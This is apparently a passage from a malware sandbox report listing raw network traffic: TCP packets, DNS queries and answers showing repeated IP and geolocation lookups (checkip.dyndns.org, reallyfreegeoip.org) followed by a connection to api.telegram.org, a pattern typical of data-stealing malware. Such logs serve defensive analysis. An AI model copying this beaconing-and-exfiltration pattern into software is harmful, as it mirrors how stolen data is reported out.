                                                                                                          Oct 30, 2024 08:14:29.600497007 CET44349167188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.600588083 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.609613895 CET49167443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.624443054 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:29.631328106 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.779253006 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.782351971 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.782378912 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.782434940 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.782906055 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:29.782917976 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:29.981163979 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:30.403060913 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:30.411058903 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:30.411083937 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:30.554591894 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:30.554660082 CET44349168188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:30.554748058 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:30.815028906 CET49168443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:31.502437115 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:31.508424997 CET8049166158.101.44.242192.168.2.22
                                                                                                          Oct 30, 2024 08:14:31.508513927 CET4916680192.168.2.22158.101.44.242
                                                                                                          Oct 30, 2024 08:14:31.526866913 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:31.532283068 CET8049169193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:31.535399914 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:31.535645008 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:31.540975094 CET8049169193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.377108097 CET8049169193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.393290043 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:32.393341064 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.393404961 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:32.393884897 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:32.393902063 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.586407900 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:32.590984106 CET8049169193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.591069937 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.019300938 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.022341967 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:33.022371054 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.161798954 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.161962986 CET44349170188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.162066936 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:33.162765026 CET49170443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:33.176868916 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.182456970 CET8049169193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.182532072 CET4916980192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.202389002 CET4917180192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.208878040 CET8049171193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.208940983 CET4917180192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.209093094 CET4917180192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:33.215476036 CET8049171193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.056884050 CET8049171193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.079502106 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.079550982 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.079602003 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.080138922 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.080152035 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.270807981 CET8049171193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.270926952 CET4917180192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:34.695266962 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.699724913 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.699759007 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.839626074 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.839828014 CET44349172188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.840938091 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.840938091 CET49172443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:34.916142941 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:34.921611071 CET8049173132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.921821117 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:34.921821117 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:34.927251101 CET8049173132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.790563107 CET8049173132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.886960983 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:35.887007952 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.887074947 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:35.903563976 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:35.903593063 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.998841047 CET8049173132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.999020100 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:36.546258926 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.550761938 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:36.550787926 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.699718952 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.699805021 CET44349174188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.699867964 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:36.702585936 CET49174443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:36.738073111 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:36.743669033 CET8049173132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.743742943 CET4917380192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:36.776213884 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:36.781574965 CET8049175193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.781641960 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:36.781786919 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:36.787110090 CET8049175193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.633635044 CET8049175193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.651210070 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:37.651251078 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.651316881 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:37.651743889 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:37.651762009 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.842832088 CET8049175193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.842890978 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:38.269531965 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.272588968 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:38.272614002 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.412597895 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.412672043 CET44349176188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.412729025 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:38.413420916 CET49176443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:14:38.429169893 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:38.435004950 CET8049175193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.435079098 CET4917580192.168.2.22193.122.6.168
                                                                                                          Oct 30, 2024 08:14:38.452521086 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:38.458004951 CET8049177132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.458090067 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:38.458283901 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:38.463608027 CET8049177132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.319819927 CET8049177132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.341025114 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:39.341073990 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.341337919 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:39.341857910 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:39.341871977 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.528481007 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:39.530790091 CET8049177132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.530838013 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:39.949047089 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.953701973 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:39.953711033 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.091212034 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.091274023 CET44349178188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.091321945 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:40.094916105 CET49178443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:40.123064995 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:40.128839016 CET8049177132.226.247.73192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.128882885 CET4917780192.168.2.22132.226.247.73
                                                                                                          Oct 30, 2024 08:14:40.148514032 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:40.153878927 CET8049179132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.153956890 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:40.154040098 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:40.159373045 CET8049179132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:41.042052031 CET8049179132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:41.057595015 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:41.057636976 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:41.057691097 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:41.058082104 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:41.058092117 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:41.244582891 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.611644030 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.614689112 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:42.614712000 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.757278919 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.757441998 CET44349180188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.757611990 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:42.758385897 CET49180443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:42.773673058 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.779468060 CET8049179132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.780128956 CET4917980192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.799388885 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.804811954 CET8049181132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.805968046 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.806113005 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:42.811372995 CET8049181132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:43.722707987 CET8049181132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:43.747467041 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:43.747505903 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:43.747565985 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:43.750324011 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:43.750334024 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:43.927575111 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:44.356218100 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.360234976 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:44.360260963 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.496081114 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.496154070 CET44349182188.114.97.3192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.496216059 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:44.497046947 CET49182443192.168.2.22188.114.97.3
                                                                                                          Oct 30, 2024 08:14:44.510270119 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:44.516072989 CET8049181132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.516134977 CET4918180192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:14:44.525051117 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:44.525080919 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.525135040 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:44.525671005 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:44.525680065 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.402276993 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.402472019 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:45.408272028 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:45.408286095 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.408576012 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.411766052 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:45.455338955 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.667479992 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.667679071 CET44349183149.154.167.220192.168.2.22
                                                                                                          Oct 30, 2024 08:14:45.667975903 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:14:45.674617052 CET49183443192.168.2.22149.154.167.220
                                                                                                          Oct 30, 2024 08:15:39.177203894 CET8049171193.122.6.168192.168.2.22
                                                                                                          Oct 30, 2024 08:15:39.177460909 CET4917180192.168.2.22193.122.6.168

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:14:25.687732935 CET5456253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET53545628.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:25.721592903 CET5291753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET53529178.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:28.630001068 CET6275153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:28.640479088 CET53627518.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:31.509744883 CET5789353192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET53578938.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:31.519071102 CET5482153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET53548218.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:32.384407997 CET5471953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:32.392698050 CET53547198.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.184201002 CET4988153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET53498818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:33.194276094 CET5499853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET53549988.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.067625999 CET5278153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:34.079013109 CET53527818.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.883960962 CET6392653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET53639268.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:34.903954029 CET6551053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET53655108.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.856962919 CET6267253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:35.866677046 CET53626728.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:35.867013931 CET6267253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:35.877414942 CET53626728.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.756798983 CET5647553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET53564758.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:36.768193007 CET4938453192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET53493848.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:37.642947912 CET5484253192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:37.650641918 CET53548428.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.435710907 CET5810553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET53581058.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:38.445019007 CET6492853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET53649288.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:39.332525015 CET5739053192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:39.340241909 CET53573908.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.130743980 CET5809553192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET53580958.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:40.140578985 CET5426153192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET53542618.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:41.049068928 CET6050753192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:41.056991100 CET53605078.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.780097008 CET5044653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET53504468.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:42.789825916 CET5593953192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET53559398.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:43.734877110 CET4960853192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:43.744806051 CET53496088.8.8.8192.168.2.22
                                                                                                          Oct 30, 2024 08:14:44.517621994 CET6148653192.168.2.228.8.8.8
                                                                                                          Oct 30, 2024 08:14:44.524665117 CET53614868.8.8.8192.168.2.22

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:14:25.687732935 CET192.168.2.228.8.8.80xabacStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.721592903 CET192.168.2.228.8.8.80xe354Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:28.630001068 CET192.168.2.228.8.8.80x5f5cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.509744883 CET192.168.2.228.8.8.80x3899Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.519071102 CET192.168.2.228.8.8.80xad78Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:32.384407997 CET192.168.2.228.8.8.80x80b8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.184201002 CET192.168.2.228.8.8.80x3660Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.194276094 CET192.168.2.228.8.8.80xb91eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.067625999 CET192.168.2.228.8.8.80x14baStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.883960962 CET192.168.2.228.8.8.80x1d7fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.903954029 CET192.168.2.228.8.8.80xd29dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.856962919 CET192.168.2.228.8.8.80xfd48Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.867013931 CET192.168.2.228.8.8.80xfd48Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.756798983 CET192.168.2.228.8.8.80x9f57Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.768193007 CET192.168.2.228.8.8.80xd004Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:37.642947912 CET192.168.2.228.8.8.80x6d95Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.435710907 CET192.168.2.228.8.8.80xd357Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.445019007 CET192.168.2.228.8.8.80xf50eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:39.332525015 CET192.168.2.228.8.8.80xaf99Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.130743980 CET192.168.2.228.8.8.80xb1fbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.140578985 CET192.168.2.228.8.8.80xd5a2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:41.049068928 CET192.168.2.228.8.8.80xfc34Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.780097008 CET192.168.2.228.8.8.80x4a07Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.789825916 CET192.168.2.228.8.8.80x7003Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:43.734877110 CET192.168.2.228.8.8.80xcf3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:44.517621994 CET192.168.2.228.8.8.80xa02eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.694839001 CET8.8.8.8192.168.2.220xabacNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:25.728992939 CET8.8.8.8192.168.2.220xe354No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
